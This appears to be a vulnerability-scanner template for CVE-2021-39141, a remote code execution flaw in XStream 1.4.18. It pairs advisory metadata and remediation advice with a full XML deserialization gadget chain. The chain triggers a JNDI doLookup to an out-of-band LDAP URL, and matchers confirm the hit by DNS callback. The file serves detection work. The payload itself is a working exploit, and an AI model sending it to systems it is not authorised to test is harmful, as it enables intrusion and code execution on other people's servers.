233 lines
12 KiB
YAML
233 lines
12 KiB
YAML
id: CVE-2021-39141
|
|
|
|
info:
|
|
name: XStream 1.4.18 - Remote Code Execution
|
|
author: pwnhxl
|
|
severity: high
|
|
description: |
|
|
XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
remediation: |
|
|
Upgrade XStream to a version that is not affected by CVE-2021-39141.
|
|
reference:
|
|
- http://x-stream.github.io/CVE-2021-39141.html
|
|
- https://x-stream.github.io/CVE-2021-39141.html
|
|
- https://github.com/x-stream/xstream/security/advisories/GHSA-g5w6-mrj7-75h2
|
|
- https://security.netapp.com/advisory/ntap-20210923-0003/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-39141
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 8.5
|
|
cve-id: CVE-2021-39141
|
|
cwe-id: CWE-434
|
|
epss-score: 0.25418
|
|
epss-percentile: 0.96265
|
|
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: xstream_project
|
|
product: xstream
|
|
tags: cve,cve2021,xstream,deserialization,rce,xstream_project
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<java.util.PriorityQueue serialization='custom'>
|
|
<unserializable-parents/>
|
|
<java.util.PriorityQueue>
|
|
<default>
|
|
<size>2</size>
|
|
</default>
|
|
<int>3</int>
|
|
<dynamic-proxy>
|
|
<interface>java.lang.Comparable</interface>
|
|
<handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
|
|
<owner/>
|
|
<managedObjectManagerClosed>false</managedObjectManagerClosed>
|
|
<databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
|
|
<stubHandlers>
|
|
<entry>
|
|
<method>
|
|
<class>java.lang.Comparable</class>
|
|
<name>compareTo</name>
|
|
<parameter-types>
|
|
<class>java.lang.Object</class>
|
|
</parameter-types>
|
|
</method>
|
|
<com.sun.xml.internal.ws.client.sei.StubHandler>
|
|
<bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
|
|
<indices>
|
|
<int>0</int>
|
|
</indices>
|
|
<getters>
|
|
<com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
|
|
</getters>
|
|
<accessors>
|
|
<com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
|
|
<val_-isJAXBElement>false</val_-isJAXBElement>
|
|
<val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
|
|
<type>int</type>
|
|
<field>
|
|
<name>hash</name>
|
|
<clazz>java.lang.String</clazz>
|
|
</field>
|
|
</val_-getter>
|
|
<val_-isListType>false</val_-isListType>
|
|
<val_-n>
|
|
<namespaceURI/>
|
|
<localPart>hash</localPart>
|
|
<prefix/>
|
|
</val_-n>
|
|
<val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
|
|
<type>java.lang.String</type>
|
|
<method>
|
|
<class>javax.naming.InitialContext</class>
|
|
<name>doLookup</name>
|
|
<parameter-types>
|
|
<class>java.lang.String</class>
|
|
</parameter-types>
|
|
</method>
|
|
</val_-setter>
|
|
<outer-class>
|
|
<propertySetters>
|
|
<entry>
|
|
<string>serialPersistentFields</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
<type>[Ljava.io.ObjectStreamField;</type>
|
|
<field>
|
|
<name>serialPersistentFields</name>
|
|
<clazz>java.lang.String</clazz>
|
|
</field>
|
|
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
</entry>
|
|
<entry>
|
|
<string>CASE_INSENSITIVE_ORDER</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
<type>java.util.Comparator</type>
|
|
<field>
|
|
<name>CASE_INSENSITIVE_ORDER</name>
|
|
<clazz>java.lang.String</clazz>
|
|
</field>
|
|
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
</entry>
|
|
<entry>
|
|
<string>serialVersionUID</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
<type>long</type>
|
|
<field>
|
|
<name>serialVersionUID</name>
|
|
<clazz>java.lang.String</clazz>
|
|
</field>
|
|
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
</entry>
|
|
<entry>
|
|
<string>value</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
<type>[C</type>
|
|
<field>
|
|
<name>value</name>
|
|
<clazz>java.lang.String</clazz>
|
|
</field>
|
|
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
</entry>
|
|
<entry>
|
|
<string>hash</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
<type>int</type>
|
|
<field reference='../../../../../val_-getter/field'/>
|
|
</com.sun.xml.internal.ws.spi.db.FieldSetter>
|
|
</entry>
|
|
</propertySetters>
|
|
<propertyGetters>
|
|
<entry>
|
|
<string>serialPersistentFields</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
|
<type>[Ljava.io.ObjectStreamField;</type>
|
|
<field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
|
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
|
</entry>
|
|
<entry>
|
|
<string>CASE_INSENSITIVE_ORDER</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
|
<type>java.util.Comparator</type>
|
|
<field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
|
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
|
</entry>
|
|
<entry>
|
|
<string>serialVersionUID</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
|
<type>long</type>
|
|
<field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
|
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
|
</entry>
|
|
<entry>
|
|
<string>value</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldGetter>
|
|
<type>[C</type>
|
|
<field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
|
|
</com.sun.xml.internal.ws.spi.db.FieldGetter>
|
|
</entry>
|
|
<entry>
|
|
<string>hash</string>
|
|
<com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
|
|
</entry>
|
|
</propertyGetters>
|
|
<elementLocalNameCollision>false</elementLocalNameCollision>
|
|
<contentClass>java.lang.String</contentClass>
|
|
<elementDeclaredTypes/>
|
|
</outer-class>
|
|
</com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
|
|
</accessors>
|
|
<wrapper>java.lang.Object</wrapper>
|
|
<bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
|
|
<dynamicWrapper>false</dynamicWrapper>
|
|
</bodyBuilder>
|
|
<isOneWay>false</isOneWay>
|
|
</com.sun.xml.internal.ws.client.sei.StubHandler>
|
|
</entry>
|
|
</stubHandlers>
|
|
<clientConfig>false</clientConfig>
|
|
</databinding>
|
|
<methodHandlers>
|
|
<entry>
|
|
<method reference='../../../databinding/stubHandlers/entry/method'/>
|
|
<com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
|
|
<owner reference='../../../..'/>
|
|
<method reference='../../../../databinding/stubHandlers/entry/method'/>
|
|
<isVoid>false</isVoid>
|
|
<isOneway>false</isOneway>
|
|
</com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
|
|
</entry>
|
|
</methodHandlers>
|
|
</handler>
|
|
</dynamic-proxy>
|
|
<string>ldap://{{interactsh-url}}/#evil</string>
|
|
</java.util.PriorityQueue>
|
|
</java.util.PriorityQueue>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "timestamp"
|
|
- "com.thoughtworks.xstream"
|
|
condition: or
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|
|
# digest: 4a0a00473045022100ee2804f5c77c03dfc26e9d12de292c8f7b478fcbad137042691fcdbc1ec33c380220406d482a8150b89f50d17d62b644ce6948fd37f18031f80c51d1c89fd5aa8e85:922c64590222798bb761d5b6d8e72950 |